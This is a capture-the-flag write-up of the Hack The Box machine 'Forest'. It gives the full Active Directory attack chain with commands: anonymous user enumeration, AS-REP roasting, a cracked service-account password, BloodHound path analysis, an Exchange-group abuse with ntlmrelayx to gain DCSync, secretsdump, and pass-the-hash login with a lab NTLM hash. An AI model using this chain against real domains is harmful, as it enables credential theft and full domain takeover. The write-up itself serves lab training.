Hack The Box - Forest


We are going to pwn Forest by egre55 & mrb3n from Hack The Box.

Link : https://www.hackthebox.eu/home/machines/profile/212

Let’s Begin with our Initial Nmap Scan.

Nmap Scan Results:

53/tcp    open   domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
63/tcp    closed via-ftp
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-20 08:27:25Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open   microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
5985/tcp  open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open   mc-nmf       .NET Message Framing
47001/tcp open   http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        Microsoft Windows RPC
49665/tcp open   msrpc        Microsoft Windows RPC
49666/tcp open   msrpc        Microsoft Windows RPC
49667/tcp open   msrpc        Microsoft Windows RPC
49670/tcp open   msrpc        Microsoft Windows RPC
49676/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open   msrpc        Microsoft Windows RPC
49684/tcp open   msrpc        Microsoft Windows RPC
49706/tcp open   msrpc        Microsoft Windows RPC
49910/tcp open   msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h29m50s, deviation: 4h02m30s, median: 9m49s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2020-03-20T01:28:47-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-03-20T08:28:48
|_  start_date: 2020-03-20T05:45:49


I logged in without the password. But it seems like no workspace available.

root@w0lf:~/CTF/HTB/Boxes/Forest# smbclient -L
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
SMB1 disabled -- no workgroup available


Connect to it without any password.

I can get a list of users with enumdomusers

root@w0lf:~/CTF/HTB/Boxes/Forest# rpcclient -U ""
Enter WORKGROUP\'s password: 

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

Getting a User Shell:

Since the port 88 is open, we can move on to the kerberosting technique. But to do Kerberosting technique we need credentials on the domain to authenticate. But we have a chance if Do not require Kerberos preauthentication is True. There is a tool called GetNPUsers.py from Impackets.

This is the tool we looking for, let’s give a try.

I created a list of users that we got from RPC enumeration.

root@w0lf:~/CTF/HTB/Boxes/Forest# cat userlist.txt 

From nmap scan it reveals a domain name htb.local so I added it to my /etc/hosts.

GetNPUsers.py -usersfile userlist.txt -dc-ip -request htb.local/

We got user svc-alfresco hash. Lets crack it using john.

We got the password for the user svc-alfresco : s3rvice

I used Evilwinrm to login.

Privilege Escalation:

We have a shell, so I gonna run Sharphound to collect all the data and copy it to my machine so I can import it to BloodHound

In Evil-WinRM there is a way to upload files easily, First we need to copy the file which we need to upload to the Evil-WinRM directory in our case it is SharpHound.exe and by using upload SharpHound.exe we can easily upload it to the machine.


Once uploaded I executed it.

./Sharphound.exe -c all

-c CollectionMethods

Now the output is stored in zip file.

Like upload command we can also Download the file. It will be stored in Evil-WinRM directory.

Drag the .zip file to the BloodHound. Once its extracted successfully you get a message.

Now Queries -> Find Shortest Paths to Domain Admins


You can see that our user svc-alfresco is in Service Account, which is a member of the Privileged IT Account, which is a member of Account Operators, it’s will be like svc-alfresco is a member of Account Operators. And Account Operators has Generic All privilege on the Exchange Windows Permissions group.

GenericAll - full rights to the object (add users to a group or reset user’s password)


We need to add a user to the group to know more about that click GenericAll and choose ? HELP and click Abuse Info. If you scroll down, you can see examples of how to do it.

First we need to add a user to Exchange Windows Permission, we can type net group "Exchange Windows Permissions" to check who is in the group.

It seems like no one. So We add svc-alfresco to this group. 18a82e8a5b01fcdbd7e6f67fc9e87665.png

Added Successfully. And Exchange Windows Permission group has WriteDcal access to Domain object in Active Directory, which enables any member of this group to modify the domain privileges, among which is the privilege to perform DCSync operation. 8d583931bebed439d5490d15ab7d6a9b.png

Reference : https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/ Next, Run ntlmrelayx

python3 ntlmrelayx.py -t ldap:// –escalate-user svc-alfresco


Now we’ve to browse to our localhost and need to give svc-alfresco password and we see the connection coming in at ntlmrelayx, which gives our user DCSync privileges.

We got connection back and if u see closely it asks us to run secretsdump.py 4bac1d7a1967d5380db1812ce82035a7.png

Here we got Administrator Hash.

secretsdump.py htb.local/svc-alfresco:s3rvice@


Now I can use this hash to login as administrator using EvilWin-RM

ruby evil-winrm.rb -i -u administrator -H “32693b11e6aa90eb43d32c72a07ceea6”

We own the Root